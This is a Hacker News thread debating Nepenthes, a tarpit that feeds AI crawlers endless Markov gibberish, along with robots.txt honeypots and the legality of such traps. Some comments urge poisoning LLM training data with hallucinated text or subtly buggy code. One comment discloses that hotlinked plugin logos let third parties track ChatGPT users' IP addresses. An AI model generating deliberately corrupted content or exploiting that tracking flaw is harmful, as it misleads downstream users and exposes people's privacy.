OpenAI responded “Not applicable” indicating they don’t think it was a serious issue.

The PoC was very easy to understand and simple to replicate.

Edit: I guess I might as well disclose it here since they don't consider it an issue. They were/are(?) hotlinking logo images of third-party plugins. When you open their plugin store it loads a couple dozen of them instantly. This allows those plugin developers (of which there are many) to track the IP addresses, and possibly more, of whoever made these requests. It's straightforward to become a plugin developer and get included. IP tracking is invisible to the user and OpenAI. A simple fix is to proxy these images and/or cache them on the OpenAI server.

griomnib10 hours ago

What do they take seriously?

ggm6 hours ago

Wouldn't it be better to perform random early drop in the path? Surely a better slowdown than forced time delays in your own server?

mmaunder18 hours ago

To be truly malicious it should appear to be valuable content but rife with AI hallucinogenics. Best to generate it with a low cost model and prompt the model to trip balls.

griomnib10 hours ago

Ohhhh, just lots and lots of code with subtle bugs!

Dwedit15 hours ago

The article claims that using this will "cause your site to disappear from all search results", but the generated pages don't have the traditional "meta" tags that state the intention to block robots.

<meta name="robots" content="noindex, nofollow">

Are any search engines respecting that classic meta tag?

jorams14 hours ago

Yes, all the big search engines respect that meta tag. Some of the big abusive AI crawlers do too, kind of defeating the (stated) point of the tarpit.

DigiEggz17 hours ago

Amazing project. I hope to see this put to serious use.

As a quick note and not sure if it's already been mentioned, but the main blurb has a typo: "... go back into a the tarpit"

phito18 hours ago

As a carnivorous plant enthusiast, I love the name.

kerkeslager17 hours ago

Question: do these bots not respect robots.txt?

I haven't added these scrapers to my robots.txt on the sites I work on yet because I haven't seen any problems. I would run something like this on my own websites, but I can't see selling my clients on running this on their websites.

The websites I run generally have a honeypot page which is linked in the headers and disallowed to everyone in the robots.txt, and if an IP visits that page, they get added to a blocklist which simply drops their connections without response for 24 hours.
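For anyone wanting to copy the idea, the moving parts are roughly these; the /honeypot path and the hidden-link markup are placeholders, and whether you link it from headers or page markup is up to you:

    # robots.txt: every rule-following crawler is told to stay out of the trap
    User-agent: *
    Disallow: /honeypot

    <!-- hidden link in the page; humans never see or follow it, so anything
         requesting /honeypot ignored robots.txt and gets blocklisted -->
    <a href="/honeypot" style="display:none" rel="nofollow">.</a>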

0xf00ff00f17 hours ago

> The websites I run generally have a honeypot page which is linked in the headers and disallowed to everyone in the robots.txt, and if an IP visits that page, they get added to a blocklist which simply drops their connections without response for 24 hours.

I love this idea!

griomnib10 hours ago

Yeah, this is elegant as fuck.

jonatron17 hours ago

You haven't seen any problems because you created a solution to the problem!

throw_m23933917 hours ago

> Question: do these bots not respect robots.txt?

No they don't, because there is no potential legal liability for not respecting that file in most countries.

reginald7816 hours ago

Is there a reason people can't use hashcash or some other proof of work system on these bad citizen crawlers?

ddmma3 hours ago

Server extension package

anocendi17 hours ago

Similar concept to SpiderTrap tool infosec folks use for active defense.

davidw18 hours ago

Is the source code hosted somewhere in something like GitHub?

monkaiju6 hours ago

Fantastic! Hopefully this not only leads to model collapse but also damages the search engines who have broken the contract they had with site makers.

klez18 hours ago

Not to be confused with the apparently now defunct Nepenthes malware honeypot.

I used to use it when I collected malware.

Archived site: https://web.archive.org/web/20090122063005/http://nepenthes....

Github mirror: https://github.com/honeypotarchive/nepenthes

rvz18 hours ago

Good.

We finally have a viable mousetrap for LLM scrapers: they continuously scrape garbage forever, depleting their own resources, whilst the LLM is fed garbage that will be unusable to the trainer, accelerating model collapse.

It is like a never-ending fast food restaurant where LLMs are forced to eat garbage input, which will destroy the quality of the model when it is used later.

Hope to see this sort of defense used widely to protect websites from LLM scrapers.

bwfan12318 hours ago

indeed. this will spur research on how to distinguish BS from legit content. which is the fundamental hallucination problem in llms.

and all of us will benefit from this.

ezrast14 hours ago

You can't programatically detect novel BS any more than you can programatically detect viruses or spam. You can only add the fingerprints of known badness into an ever-growing database. Viruses and spam are antagonistic to well-resourced institutions, and their databases get maintained reasonably well. LLM slop is being generated by those same well-resourced institutions. I don't think it fits into the same category as Nepenthes.

guluarte8 hours ago

markov chains?

deadbabe14 hours ago

Does anyone have a convenient way to create a Markov babbler from the entire corpus of Hackernews text?

grahamj17 hours ago

That’s so funny, I’ve thought of this exact idea several times over the last couple of weeks. As usual someone beat me to it :D

GaggiX18 hours ago

As always, I find it hilarious that some people believe that these companies will train their flagship model on uncurated data, and that text generated by a Markov chain will not be filtered out.

JTyQZSnP3cQGa8B13 hours ago

Then why the DDOS on random web sites?

GaggiX13 hours ago

I guess that depends on how the webspider is configured, I doubt the curation is done in real-time while scraping.

at_a_remove19 hours ago

I have a very vague concept for this, with a different implementation.

Some, uh, sites (forums?) have content that the AI crawlers would like to consume, and, from what I have heard, the crawlers can irresponsibly hammer the traffic of said sites into oblivion.

What if, for the sites which are paywalled, the signup, which invariably comes with a long click-through EULA, had a legal trap within it, forbidding ingestion by AI models on pain of, say, owning ten percent of the company should this be violated. Make sure there is some kind of token payment to get to the content.

Then seed the site with a few instances of hapax legomenon. Trace the crawler back and get the resulting model to vomit back the originating info, as proof.

This should result in either crawlers being more respectful or the end of the hated click-through EULA. We win either way.

928340923219 hours ago

This doesn't work like you think it does, but even if it did, do you have the money to sustain a years-long legal battle against OpenAI?

grajaganDev19 hours ago

Exactly, the lawyers would be the only winners (as usual).

slavik8118 hours ago

In Canada and the United States, the penalties for breach of contract are determined based on the actual damages caused. Penalty clauses are generally not enforceable. The courts would ignore your clause and award a dollar amount based on whatever actual damages that you can prove.

That said, I am not a lawyer and this may not be true in all jurisdictions.

registeredcorn19 hours ago

I seem to recall some online lawyer saying that much of what's actually described in EULAs isn't strictly enforceable, simply because it is mentioned.

For example, a EULA might have buried in it that by agreeing, you will become their slave for the next 10 years of your life (or something equally ridiculous). Were it to actually go to court for "violating the agreement", it would be obvious that no rational person would ever actually agree to such an agreement.

It basically boiled down to a claim that the entire process of EULAs are (mostly) pointless because it's understood that no one reads them, but companies insist upon them because a false sense of protection, and the ability to threaten violators of (whatever activity) is better than nothing. A kind of "paper threat".

As it's coming back to me, I think one of the real world examples they used was something like this:

If you go to a golf course, you might see a sign that says, "The golf course is not responsible for damage to your car from golf balls." The sign is essentially meant as a false deterrent: it's there to keep people from complaining by "informing them of the risk" and making it seem official, so employees will insist it's true if anyone complains. But if you were actually to take it to court, the golf course might still be found culpable, because they theoretically could have done something to prevent damage to customers' cars and they were aware of the damage that could be caused.

Basically, just because a sign (or the EULA) says it, doesn't make it so.

grajaganDev19 hours ago

Legal traps are not a thing.

rvnx19 hours ago

Laws don't apply to billionaires

grajaganDev19 hours ago

Agreed.

observationist18 hours ago

[flagged]

jsheard18 hours ago

This is a really bad take, it's not like this server is hacking clients which connect to it. It's providing perfectly valid HTTP responses that just happen to be slow and full of markov gibberish, any harm which comes of that is self inflicted by assuming that websites must provide valuable data as a matter of course.

If AI companies want to sue webmasters for that then by all means, they can waste their money and get laughed out of court.

bwfan12318 hours ago

yea, it comes across as an extremely entitled mobster take.

heads i win, tails you lose. we own all your content, and you better behave.

i can bet this is incentive-speak.

observationist17 hours ago

[flagged]

tofof16 hours ago

Please provide a citation for a law that proscribes me from publicly offering a service which consumes time while it is voluntarily engaged with.

jazzyjackson15 hours ago

I guess it's an unpopular take but I don't see why it was flagged. It's a good point of discussion.

observationist18 hours ago

[flagged]

blibble18 hours ago

> If you want to protect your content, use the technical mechanisms that are available,

> You can choose to gatekeep your content, and by doing so, make it unscrapeable, and legally protected.

so... robots.txt, which the AI parasites ignore?

> Also, consider that relatively small, cheap llms are able to parse the difference between meaningful content and Markovian jabber such as this software produces.

okay, so it's not damaging, and there you've refuted your entire argument

tofof17 hours ago

He's not interfering with any normal operation of any system. He is offering links. You can follow them or not, entirely at your own discretion. Those links load slowly. You can wait for them to complete or not, entirely at your own discretion.

The crawler's normal operation is not interfered with in any way: the crawler does exactly what it's programmed to do. If its programmers decided it should exhaustively follow links, he's not preventing it from doing that operation.

Legally, at best you'd be looking to warp the concept of attractive nuisance to apply to a crawler. As that legal concept is generally intended to prevent bodily harm to children, however, good luck.

grajaganDev18 hours ago

Are you a lawyer?

observationist17 hours ago

[flagged]

jazzyjackson15 hours ago

I broadly agree with what you're trying to get across here, but I don't see why I can't set my own standards for what use of my server is authorized or not.

If I publish content at my domain, I can set up blocklists to refuse access to IP ranges I consider more likely to be malicious than not. Is that not already breaking the social contract you're pointing to wrt serving content publicly? Picking and choosing which parts of the public will get a response from my server? (I would also be interested to know if there is actual law vs. social contracts around behavior.) So why shouldn't I be able to enforce expectations on how my server is used? The vigilantism aspect of harming the person breaking the rules is another matter; I'm on the fence.

Consider the standard warning posted to most government sites, which is more or less a "no trespassing sign" [0] informing anyone accessing the system what their expectations should be and what counts as authorized use. I suppose it's not a legally binding contract to say "you agree to these terms by requesting this url" but I'm pretty sure convictions have happened with hackers who did not have a contract with the service provider.

[0] https://ir.nist.gov/